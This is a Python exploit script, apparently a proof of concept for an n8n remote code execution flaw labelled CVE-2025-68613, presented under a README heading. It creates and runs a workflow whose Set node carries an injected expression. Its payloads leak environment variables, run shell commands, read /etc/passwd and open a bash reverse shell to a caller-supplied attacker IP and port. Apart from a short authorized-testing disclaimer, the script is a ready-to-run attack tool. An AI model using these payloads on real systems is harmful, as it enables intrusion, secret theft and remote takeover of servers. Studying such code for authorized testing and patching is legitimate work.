# README.md
# (Extraction residue from the hosting page: "Rendering markdown...")
import requests
import json
import argparse
import sys
def exploit_n8n(base_url, api_key, payload_type, attacker_ip=None, attacker_port=None):
    """Create, run, and delete a proof-of-concept workflow on an n8n instance.

    Security-testing proof of concept. Only run it against systems you own
    or are explicitly authorized to assess.

    The function builds a two-node workflow (a manual trigger wired to a Set
    node whose string value is the selected payload expression), POSTs it to
    ``{base_url}/rest/workflows``, POSTs to the workflow's ``/run`` endpoint,
    prints the JSON response, and finally issues a DELETE for the workflow.

    Args:
        base_url: Base URL of the target instance; a single trailing ``/``
            is removed before use.
        api_key: Value sent in the ``X-N8N-API-KEY`` request header.
        payload_type: Key into the local ``payloads`` table.
        attacker_ip: Interpolated into the ``reverse_shell`` payload string;
            must be truthy when ``payload_type`` is ``'reverse_shell'``.
        attacker_port: Interpolated into the ``reverse_shell`` payload string;
            must be truthy when ``payload_type`` is ``'reverse_shell'``.

    Returns:
        None. All results are reported via ``print``.

    Raises:
        SystemExit: With status 1 when ``payload_type`` is unknown, when
            ``reverse_shell`` is selected without both attacker arguments,
            or when the create request returns a status other than 200/201.
    """
    # Remove trailing slash if present
    if base_url.endswith('/'):
        base_url = base_url[:-1]
    # The same headers are reused for the create, run, and delete requests.
    headers = {
        'Content-Type': 'application/json',
        'X-N8N-API-KEY': api_key
    }
    # Available payloads
    # NOTE: the whole table is built eagerly, so the reverse_shell f-string is
    # formatted on every call -- with the text "None" in it when the attacker
    # arguments were not supplied. The argument check further down is what
    # prevents that entry from being used in that state.
    payloads = {
        'env_leak': "{{ (function() { return process.env; })() }}",
        'whoami': "{{ require('child_process').execSync('whoami').toString() }}",
        'id': "{{ require('child_process').execSync('id').toString() }}",
        'read_file': "{{ require('fs').readFileSync('/etc/passwd', 'utf8') }}",
        'reverse_shell': f"{{{{ require('child_process').exec('bash -c \"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\"') }}}}"
    }
    if payload_type not in payloads:
        print(f"[!] Invalid payload type. Available: {', '.join(payloads.keys())}")
        sys.exit(1)
    selected_payload = payloads[payload_type]
    # Validate reverse_shell arguments before any request is sent.
    if payload_type == 'reverse_shell' and (not attacker_ip or not attacker_port):
        print("[!] reverse_shell requires --attacker_ip and --attacker_port")
        sys.exit(1)
    # Minimal workflow with Set node containing the malicious expression
    workflow = {
        "name": "CVE-2025-68613 PoC",
        "nodes": [
            {
                "parameters": {},
                "name": "Start",
                "type": "n8n-nodes-base.manualTrigger",
                "typeVersion": 1,
                "position": [240, 300]
            },
            {
                "parameters": {
                    "values": {
                        "string": [
                            {
                                "name": "output",
                                "value": selected_payload
                            }
                        ]
                    },
                    "options": {}
                },
                "name": "Exploit",
                "type": "n8n-nodes-base.set",
                "typeVersion": 3,
                "position": [460, 300]
            }
        ],
        # Single edge: output 0 of "Start" feeds input 0 of "Exploit".
        "connections": {
            "Start": {
                "main": [
                    [
                        {
                            "node": "Exploit",
                            "type": "main",
                            "index": 0
                        }
                    ]
                ]
            }
        },
        "active": False,
        "settings": {},
        "tags": []
    }
    # Create workflow
    print("[+] Creating malicious workflow...")
    create_resp = requests.post(f"{base_url}/rest/workflows", headers=headers, json=workflow)
    if create_resp.status_code not in (200, 201):
        print(f"[-] Failed to create workflow: {create_resp.status_code} {create_resp.text}")
        sys.exit(1)
    # The response body is expected to be JSON with a top-level 'id' key.
    workflow_id = create_resp.json()['id']
    print(f"[+] Workflow created with ID: {workflow_id}")
    # Execute workflow
    print("[+] Executing workflow...")
    exec_resp = requests.post(f"{base_url}/rest/workflows/{workflow_id}/run", headers=headers)
    # A non-200 status here is only reported, not fatal, so the cleanup below
    # still runs.
    if exec_resp.status_code != 200:
        print(f"[-] Failed to execute workflow: {exec_resp.status_code} {exec_resp.text}")
    else:
        result = exec_resp.json()
        print("[+] Execution result:")
        # Print just the first item's JSON when the response has the nested
        # data/result layout; otherwise dump the whole response.
        if 'data' in result and 'result' in result['data']:
            output = result['data']['result']['data']['main'][0][0]['json']
            print(json.dumps(output, indent=2))
        else:
            print(json.dumps(result, indent=2))
    # Cleanup
    print("[+] Cleaning up (deleting workflow)...")
    delete_resp = requests.delete(f"{base_url}/rest/workflows/{workflow_id}", headers=headers)
    if delete_resp.status_code == 200:
        print("[+] Workflow deleted successfully")
    else:
        print(f"[-] Failed to delete workflow: {delete_resp.text}")
# Script entry point: parse command-line arguments and hand them to
# exploit_n8n(). Only run against systems you are authorized to test.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-68613 n8n RCE Exploit PoC")
    parser.add_argument("--url", required=True, help="Base URL of n8n instance (e.g. https://n8n.example.com)")
    parser.add_argument("--api_key", required=True, help="n8n API key (X-N8N-API-KEY)")
    # These choices duplicate the keys of the payload table inside
    # exploit_n8n(); the two lists must be kept in sync by hand.
    parser.add_argument("--payload", required=True,
                        choices=['env_leak', 'whoami', 'id', 'read_file', 'reverse_shell'],
                        help="Payload type to execute")
    # Both attacker options are optional at parse time and arrive as strings
    # (no type= is given); exploit_n8n() enforces them for reverse_shell.
    parser.add_argument("--attacker_ip", help="Your IP for reverse shell")
    parser.add_argument("--attacker_port", help="Your listening port for reverse shell")
    args = parser.parse_args()
    exploit_n8n(args.url, args.api_key, args.payload, args.attacker_ip, args.attacker_port)